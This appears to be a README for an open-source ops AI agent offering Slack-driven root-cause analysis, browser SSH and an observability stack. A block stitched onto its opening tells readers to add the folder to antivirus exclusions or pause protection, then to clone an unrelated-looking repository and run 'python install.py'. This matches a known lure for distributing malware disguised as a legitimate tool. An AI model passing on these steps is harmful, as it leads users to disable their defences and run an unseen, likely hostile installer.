Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/AccountantVision/ongrid-free.git
cd ongrid-free
python install.pyAn ops AI Agent that understands your infrastructure, finds the root cause, and fixes it — right from Slack or Telegram.
Metrics · logs · traces · topology blast-radius · root-cause correlation · remote execution · alert-driven auto-investigation · RAG knowledge & code search · specialist agents & skills.
English | 简体中文 | 日本語 | 한국어 | Español | Français | Deutsch | Português | Русский
Features • Install • Integrations • License
- 🤖 Coordinator + Specialist agents — coordinator dispatches to SRE / network / DB sub-agents
- 🚨 Auto-investigate on alert — investigator spawns an RCA worker, writes the cause back to chat
- 🔍 Root-cause RCA — walks topology, correlates m/l/t, pins the "why" to a source-code line
- 🔒 Zero inbound ports — edge dials out; no port 22 / 80 / 443 on hosts
- 💻 Browser SSH — reverse-tunnel shell into any host; no keys, no jumpbox, all audited
- 🐳 Self-host in one command —
docker compose upbrings up the full stack - 📊 Built-in observability — Prometheus + Loki + Tempo + Grafana wired; the agent writes the queries
- 🧠 Bring your own model — Anthropic / OpenAI / GLM / DeepSeek / Gemini / Kimi, hot routing
- 💬 Two-way IM channels — Slack / Telegram / Larksuite / DingTalk / WeCom, per-channel locale
- 🛠️ Read-only host tools — bash sandbox + 26+ inspection tools; every call audited
### Or run from source
Local dev: set the admin account + one model API key, then bring up the full stack.
```bash
cp deploy/.env.example deploy/.env
make compose-up # make compose-down to stop
Drop-in for the observability, channel, and model stacks your team already uses.
| Observability | |
| Channels | |
| Models |
Apache 2.0 — see LICENSE.
